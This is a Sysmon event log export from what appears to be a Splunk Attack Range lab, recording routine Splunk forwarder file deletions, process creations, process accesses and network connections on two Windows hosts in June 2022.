Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB680A37AFB04F750A8E2F1066B21E6F,SHA256=B18E055E34FD0218AAD6EB5A4AADFEC7B923851F0C6D1CEF88388F988DF57CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:09.409{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-230MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044602Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:09.014{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00C6A68CF6188ED749A61F4DEA55A34C,SHA256=B1017D9C1C7ACCBDCEAC1F4C15E8DF32D4B367EDCC6D05597C29CDE64D524F84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:10.438{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C65E0204980A558AE3E72EB773FE9DA4,SHA256=FC556E5896448AEB525C3EBCDB98F6A5DF1826C61D955F4EA97135099669EE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044603Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:10.108{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0071C3651BBEA58448FCDDF8374D3A22,SHA256=DF5D5B32422C870A49E339AA993E7440C8C495736DA5D1CC7CCB674F52CFD219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:11.554{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BBD6408F0B13B69CDDD24FEAADAA3E9,SHA256=C3A223241A24627C88F79F78C97602F8C0F144CA01AF5FD1E335372F94F9F30B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044605Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:09.804{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52369-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044604Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:11.202{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B51AE7989F06E7C42316CFDCB48D4BD,SHA256=F3E17E6DD00503F337A78C1C2447B70337AFD8AB942EE13011BB2E8E4EEE393F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044606Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:12.295{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=500AD30AB4E45309D112346B4B5D07F3,SHA256=896D7B184217A8983144B697656EC6D6AECBFAB9707562C7F0A7D42DC1BBCC1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:12.687{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFBE79021E5B15775F6B06162F96063C,SHA256=34A1721E6858702EDAC658EC0F55EC45BAC0925B47660B8EB7D92F4E0672BC68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:13.723{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10AF9D27941F6E1A3D6B81106F904DEB,SHA256=56EF93F6D0FDD7127866F9BEED83CC907B162E112F7B2391D0E7A0A0FA0E85D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044607Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:13.389{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6B7F760B34B13310E30BBEEC3E93AFC,SHA256=C5B4A6B9A8DE4EEB612C14883BC172358661897524345179C006D5E514525417,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:14.854{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B1F969CB4E51ACBD32271A961BD58C2,SHA256=7312A42814D75DEF4E1DC1642B495E65391F87AD44C7BC934566B47AA31328D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044608Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:14.483{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B64C5678E58A3CC6B0CFD0295825DB70,SHA256=89CF92C6E8123272FA61F0C26530A5EE68FA299225BDEAF2BB9761BEA600CC89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:15.954{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E5B0C56432728DB52015B19AB2506F1,SHA256=3AB4B7FDBAEB8A112CFFA3FBB8002D2FC220965C27AE18EDA1F4E0036661478D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044609Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:15.577{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84212C7BADC97DF7C186A650C3E51BA,SHA256=A796D8127CBC561B1D6F9A126346BD392DE6862C4571A38171A786526374AB03,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:12.718{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56401-false10.0.1.12-8000- 23542300x8000000000000000205647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:16.987{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA64CCA3F13B23E2143D48C49903BCF0,SHA256=7E1356E8D4860F7F44EBB09A39B5CB4AFD9D165DB8FCCCDC1791E98B7E601366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044610Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:16.670{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97EC17F98314010F325CE87C56117ABF,SHA256=936F98B613839A7C7739FBFE0DE26426E1288A0B19EE41FF0F8C3F86B0D004E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044611Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:17.873{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77A71E35686404F7283D0AC49ECE39F7,SHA256=C2FAE61B54BB99C410A23E4DAA195C5B9D7120B6F2A7EEE254B388A5774626F6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.937{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18A1-629A-5B42-000000005F02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.937{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-18A1-629A-5B42-000000005F02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.937{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.937{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18A1-629A-5B42-000000005F02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.938{2E1864BB-18A1-629A-5B42-000000005F02}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.706{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=3F78EAAA593483B912BAFF1D2571F4D7,SHA256=C4659B295D56EE141CF554102E786FFA8B58D9DC00EBF8719C4F0915DB9B9514,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.268{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18A1-629A-5A42-000000005F02}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.268{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.268{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.268{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.268{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.268{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-18A1-629A-5A42-000000005F02}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.268{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18A1-629A-5A42-000000005F02}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.269{2E1864BB-18A1-629A-5A42-000000005F02}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044613Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:18.967{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 